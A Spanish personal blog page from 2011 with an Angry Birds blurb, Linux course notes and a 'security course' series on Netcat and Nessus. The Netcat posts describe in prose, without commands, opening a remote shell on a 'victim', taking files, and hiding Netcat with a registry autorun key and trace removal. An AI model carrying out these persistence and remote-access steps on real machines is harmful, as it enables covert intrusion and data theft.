Un tirachinas para lanzar pájaros con muy mala uva y destruir las casas de unos tranquilos cerdos: ése es tu objetivo en Angry Birds.

Ahora Angry Birds es uno de los juegos más populares en el panorama de juegos para móviles de última generación.

Con mucho sentido del humor, Angry Birds es tan simple como adictivo. Tendrás que calcular el mejor tiro posible para que tus pájaros kamikaze destrocen las casitas de los cerdos.

miércoles, 19 de enero de 2011

Curso de Seguridad: Cuarta parte…(Netcat II)

En este vídeo, continuo con la "navaja suiza", el Netcat, y os explico aunque no sin algún error corregido, como hacer que sea nuestra posible victima la que inicie la comunicación con nosotros y ademas como ocultar al Netcat en la maquina atacada de forma que se auto-ejecute y no sea visible por cualquier usuario...os enseño a ocultarlo en una carpeta de Windows, cambiarle los atributos, borrar todo rastro posible y crear una llave en el registro de forma que nuestra victima lo autoejecute siempre al inicio de la sesión.....de todas formas aun me queda en próximos tutoriales enseñaros a como rastrear puertos y elegir a nuestra victima segun ciertos criterios...

Para los interesados os dejo un archivo comprimido con los fuentes en su interior para que hagais prácticas con ellos....

Ficheros de Netcat usados en la práctica


MD5: 8dd4f8d4a7a2f4ac9c8b20fd36ce87af


SHA1: ae785dd3a022aeb5907454d49a117111a22d4c90



...Intentare continuar este tema más adelante....





martes, 18 de enero de 2011

Curso de Seguridad: Tercera parte...(Nessus I)

En este vídeo que dividiré en 2 partes por su longitud...veremos como instalar Nessus en Linux y configurarlo, poniendo la clave obtenida desde su web, su instalación y descarga y como crear un usuario para su uso...continuará muy pronto....





Curso de Seguridad: Segunda parte...(Netcat I)

En este caso os dejo mi segundo tutorial sobre seguridad en Linux, con el uso de "la navaja suiza" que en realidad es el pequeño pero funcional Netcat.

Usamos el Netcat para 3 posibles usos que hemos visto en mi curso de seguridad:

  • Como crear un chat en vivo entre dos host.

  • Como lanzar en una posible victima una consola de comandos y controlarla.

  • Como quitarle o traspasar archivos de la victima hacia nuestro Linux.


En cualquiera de los casos los posibles casos de usos de esta herramienta son infinitos...

Os dejo el enlace al Netcat para Windows


Netcat para Windows (tanto el zip como el ejecutable)


MD5 (zip): 9252b99be2ee208c1cb8c085a42956d8


SHA1 (zip): 64d141424e9ae8f5b34291b2695e0dc3f4660263


MD5 (exe): ab41b1e2db77cebd9e2779110ee3915d


SHA1 (exe): 4122cf816aaa01e63cfb76cd151f2851bc055481



Pronto continuaré el tutorial....





domingo, 16 de enero de 2011

Curso de Linux para novatos, brutos y extremadamente torpes


Parte (I): Iniciación al Sistema Operativo Linux.

  • A quién va dirigido este curso.

  • Introducción a Linux.

  • Algunos conceptos básicos.

  • El manual del sistema.

  • La shell.

Meada...


Con permiso de mis colegas de LinuxHispano.net...pues me hizo mucha gracia...

jueves, 6 de enero de 2011

REGALO DE REYES...

Hoy dia 5 de Enero he terminado por fin el regalo de Reyes para un amigo...su página WEB.

Aquí os dejo el enlace espero que os guste mi trabajo...¡¡¡¡ FELIZ DIA A TODOS !!!!